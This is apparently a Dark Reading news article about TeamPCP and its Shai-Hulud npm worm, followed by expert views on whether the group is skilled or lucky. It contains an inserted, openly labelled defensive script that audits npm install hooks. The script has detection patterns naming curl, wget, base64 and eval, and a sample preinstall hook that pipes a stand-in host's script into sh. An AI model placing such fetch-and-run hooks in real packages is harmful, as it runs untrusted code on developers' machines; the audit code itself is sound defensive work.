Dark Reading
The Hackers Behind Shai-Hulud: Lucky or Skilled?
TeamPCP, the hackers behind the Shai-Hulud worm, has done significant damage to the open source ecosystem. But it's not necessarily due to skill alone.
Alexander Culafi, Senior News Writer, Dark Reading
May 26, 2026
5 Min Read
TeamPCP has made a name for itself as a scourge of the open source community following Shai-Hulud, but the group's attack history is less "sophisticated threat actor" and more "right place, right time" luck.
A financially motivated threat actor, TeamPCP formally emerged in late 2025, making a name for itself by exploiting the React2Shell vulnerability and by targeting misconfigured Docker APIs and Next.js deployments. As researchers from Flare recently noted, the group historically used such opportunistic compromises to deploy ransomware, steal data for resale, and mine cryptocurrency.
The group's rise in notoriety this year came alongside its increasing focus on software supply chain compromises. Starting last summer, the group's Shai-Hulud worm ravaged the open source development ecosystem with its capacity to self-replicate and then poison developers downstream. When a developer installed an npm (node package manager) package poisoned with Shai-Hulud, the worm ran on that developer's machine, harvested the npm publishing tokens it found there, and used them to push malicious updates to the otherwise legitimate packages that developer maintained, turning each of those packages into a new carrier.
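The propagation mechanism described above depends on the poisoned package getting code execution at install time, which on npm means a lifecycle script in package.json. As an added example (not code from the article, from TeamPCP, or from any of the vendors quoted below), the Node script that follows is the defender-side check a practitioner would want: it audits a set of package manifests for install-time hooks and flags the ones whose command looks like it runs or fetches a payload. The sample manifests, their package names and the `SUSPICIOUS` heuristics are constructed for illustration and are not a published indicator list.

```javascript
// Added example: audit npm package manifests for install-time lifecycle
// scripts, the point at which a poisoned package gets code execution on the
// developer's machine. Not code from the article or from TeamPCP; the sample
// manifests and the heuristics are constructed for illustration.

// npm runs these hooks automatically during `npm install` unless
// ignore-scripts is set, so whatever they run executes with the developer's
// privileges and credentials before the developer ever looks at the package.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristics that make an install hook worth a human look. These are
// assumptions for this example, not an indicator list from any report.
const SUSPICIOUS = [
  { reason: "runs a bundled JavaScript file", re: /\bnode\s+[^\s;&|]+\.c?js\b/i },
  { reason: "downloads content at install time", re: /\b(curl|wget)\b/i },
  { reason: "decodes an embedded payload", re: /\bbase64\b/i },
  { reason: "evaluates dynamic code", re: /\beval\b/i },
];

// Inspect one package.json object; returns one finding per install hook present.
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string" || cmd.trim() === "") continue;
    const reasons = SUSPICIOUS.filter((s) => s.re.test(cmd)).map((s) => s.reason);
    findings.push({
      pkg: `${manifest.name}@${manifest.version}`,
      hook,
      cmd,
      suspicious: reasons.length > 0,
      reasons,
    });
  }
  return findings;
}

// Audit a whole dependency tree (an array of manifests, e.g. one per
// node_modules/*/package.json) and split the results into "needs review"
// and "has a hook, but nothing in it matched".
function auditTree(manifests) {
  const all = manifests.flatMap(auditManifest);
  return {
    total: all.length,
    suspicious: all.filter((f) => f.suspicious),
    benignHooks: all.filter((f) => !f.suspicious),
  };
}

// Constructed sample manifests; these are not real packages.
const SAMPLE_MANIFESTS = [
  { name: "left-pad-clone", version: "1.0.0", scripts: { test: "jest" } },
  { name: "repo-tooling", version: "2.3.1", scripts: { prepare: "husky install" } },
  { name: "ui-widgets", version: "4.0.2", scripts: { postinstall: "node bundle.js" } },
  { name: "build-helper", version: "0.9.0",
    scripts: { preinstall: "curl -s https://example.invalid/setup.sh | sh" } },
];

// Print a report when run directly (guarded so the block also loads as a module).
if (typeof require !== "undefined" && typeof module !== "undefined" && require.main === module) {
  const report = auditTree(SAMPLE_MANIFESTS);
  console.log(`${report.total} install hooks found, ${report.suspicious.length} need review`);
  for (const f of report.suspicious) {
    console.log(`  ${f.pkg} ${f.hook}: ${f.cmd} [${f.reasons.join("; ")}]`);
  }
}
```

To run this against a real project, feed `auditTree` the parsed `package.json` of every directory under `node_modules` instead of `SAMPLE_MANIFESTS`. A hook that only matches the "benign" bucket (the `husky install` prepare script above) still deserves a glance, because the heuristics only catch patterns that were assumed here; the cheaper structural control is to set `ignore-scripts=true` in `.npmrc` so no lifecycle script runs at install time at all, and to opt individual packages back in deliberately.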
TeamPCP is widely believed to be one of the, if not the, primary threat actor behind the Shai-Hulud attacks.
TeamPCP Rattles the Software Ecosystem
TeamPCP followed the initial Shai-Hulud with waves of successor attacks, including malware like GlassWorm, before ultimately releasing open source code for Shai-Hulud earlier this month. Researchers speculated that the threat actor did this as a way to scale Shai-Hulud's potential (as TeamPCP's command-and-control infrastructure was tied to the open source code), overwhelm defenders, and advertise an affiliate program the group had just launched.
And most recently, TeamPCP took credit for a compromise against GitHub, where an employee downloaded a poisoned VS Code extension that resulted in the theft of approximately 4,000 repositories of private code.
Ilkka Turunen, field chief technical officer at Sonatype, tells Dark Reading that this latest incident is a reminder that developers are now "permanent targets" in software supply chain attacks.
"TeamPCP has shown how a motivated attacker can move through the tools developers trust every day — open source packages, extensions, accounts, and credentials — rather than trying to break in through the front door," Turunen says.
One of the more notable aspects of TeamPCP is that it threw such an aggressive wrench into the open source ecosystem despite being only a few months old as a group and not necessarily the biggest threat actor out there.
That said, its formal "age" may be misleading, as some researchers date TeamPCP activity to 2024, and threat actors don't necessarily start their cybercrime careers with the forming of a new group. Rather, the individuals that make up a cybercrime outfit may carry multiple affiliations, and core members may jump from group to group as one threat brand stops being effective (such as via law enforcement compromise or reputational loss).
TeamPCP's Cybercrime Success: Luck or Sophistication?
Kevin Tian, CEO and co-founder of Doppel, tells Dark Reading that the threat actor didn't just get lucky. Rather, he says, TeamPCP understands how to exploit modern trust relationships inside software development environments.
"What stands out is less raw technical sophistication and more operational effectiveness," Tian explains. "TeamPCP appears highly capable of combining social engineering, trusted-platform abuse, and AI-assisted reconnaissance to move faster than traditional security defenses were designed to handle. They're proving attackers no longer need advanced zero-days when they can compromise trusted identities, trusted tools, and trusted workflows instead."
The CEO calls this part of a larger trend among cybercriminals who are choosing to target user trust (such as the assumption that an open source component with millions of downloads won't be poisoned) rather than attacking infrastructure directly. Elements of this trend can be seen elsewhere, such as in ClickFix attacks (which exploit a user's trust in software prompts) and in increasingly sophisticated social engineering attacks.
Melissa Bischoping, senior director of security and product design research at Tanium, meanwhile says TeamPCP's rise isn't necessarily a question of sophistication or luck, but rather something that speaks to the realities of developer-focused supply chain attacks.
"Supply chain attacks on developer tooling have such favorable mechanics for the attacker that capable crews can score outsized impact, and that's most of what's going on here," she tells Dark Reading. "The Mini Shai-Hulud campaigns are among the first worms we've seen actually weaponize SLSA [Supply-Chain Levels for Software Artifacts, an OpenSSF security framework used to prevent tampering with software builds] provenance attestation, and that shows technical depth and creativity, but I don't think they rise to the level of truly sophisticated overall. The rest of the operational pattern reads as mid-tier cybercrime with a good eye for targets and a great marketing strategy."
In this way, TeamPCP is reminiscent of DragonForce, a newer ransomware-as-a-service (RaaS) group that gained prominence less because it was particularly sophisticated and more because it effectively marketed itself. DragonForce is a fairly prolific group best known for its white-labeling service, in which would-be cybercriminals can use their own branding on top of DragonForce infrastructure.
Charlie Eriksen, security researcher at Aikido Security, notes that TeamPCP borrows heavily from other threat actors and leans heavily on AI to build its payloads. Echoing Bischoping's comments, Eriksen observes that the gang's tactics don't exactly require sophistication.
"They don't really need to be sophisticated though, because once you have a publishing credential for a popular extension you've got a direct push channel into every machine running it," he explains. "They figured out early that open source developer tooling was a soft target, and they've just been hitting it consistently since."
About the Author
Alexander Culafi
Senior News Writer, Dark Reading
Alex is an award-winning writer, journalist, and podcast host based in Boston. After cutting his teeth writing for independent gaming publications as a teenager, he graduated from Emerson College in 2016 with a Bachelor of Science in journalism. He has previously been published on VentureFizz, Search Security, Nintendo World Report, and elsewhere.
At Dark Reading, he covers a variety of cybersecurity topics, including the cybercrime ecosystem, open source security, and the intersection between AI and threat actors. In his spare time, Alex hosts the weekly Nintendo podcast, "Talk Nintendo Podcast," and works on personal writing projects, including two previously self-published science fiction novels.
He has received numerous awards, including TechTarget's Writer of the Year in 2022 as well as more than 10 Azbee awards for his reporting between 2022 and today.